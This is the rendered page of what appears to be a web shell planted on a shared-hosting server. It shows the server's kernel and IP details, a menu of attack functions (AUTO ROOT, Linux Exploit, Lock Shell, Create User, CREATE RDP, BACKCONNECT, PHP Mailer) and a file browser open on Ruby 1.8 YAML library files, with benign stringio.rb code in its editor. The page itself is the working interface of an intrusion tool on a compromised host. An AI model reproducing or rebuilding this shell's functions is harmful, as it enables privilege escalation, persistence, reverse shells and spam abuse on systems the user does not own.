Linux server123.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.126.127 | : 216.73.216.107
Cant Read [ /etc/named.conf ]
?8.4.14
ezdajrnh
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
yaml /
[ HOME SHELL ]
Name
Size
Permission
Action
baseemitter.rb
5.62
KB
-rw-r--r--
basenode.rb
5.98
KB
-rw-r--r--
constants.rb
1.16
KB
-rw-r--r--
dbm.rb
2.24
KB
-rw-r--r--
encoding.rb
605
B
-rw-r--r--
error.rb
1.04
KB
-rw-r--r--
loader.rb
296
B
-rw-r--r--
rubytypes.rb
12.73
KB
-rw-r--r--
store.rb
703
B
-rw-r--r--
stream.rb
700
B
-rw-r--r--
stringio.rb
1.92
KB
-rw-r--r--
syck.rb
271
B
-rw-r--r--
tag.rb
3.08
KB
-rw-r--r--
types.rb
4.88
KB
-rw-r--r--
yamlnode.rb
1.19
KB
-rw-r--r--
ypath.rb
1.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stringio.rb
# # Limited StringIO if no core lib is available # begin require 'stringio' rescue LoadError # StringIO based on code by MoonWolf class StringIO def initialize(string="") @string=string @pos=0 @eof=(string.size==0) end def pos @pos end def eof @eof end alias eof? eof def readline(rs=$/) if @eof raise EOFError else if p = @string[@pos..-1]=~rs line = @string[@pos,p+1] else line = @string[@pos..-1] end @pos+=line.size @eof =true if @pos==@string.size $_ = line end end def rewind seek(0,0) end def seek(offset,whence) case whence when 0 @pos=offset when 1 @pos+=offset when 2 @pos=@string.size+offset end @eof=(@pos>=@string.size) 0 end end # # Class method for creating streams # def YAML.make_stream( io ) if String === io io = StringIO.new( io ) elsif not IO === io raise YAML::Error, "YAML stream must be an IO or String object." end if YAML::unicode def io.readline YAML.utf_to_internal( readline( @ln_sep ), @utf_encoding ) end def io.check_unicode @utf_encoding = YAML.sniff_encoding( read( 4 ) ) @ln_sep = YAML.enc_separator( @utf_encoding ) seek( -4, IO::SEEK_CUR ) end def io.utf_encoding @utf_encoding end io.check_unicode else def io.utf_encoding :None end end io end end
Close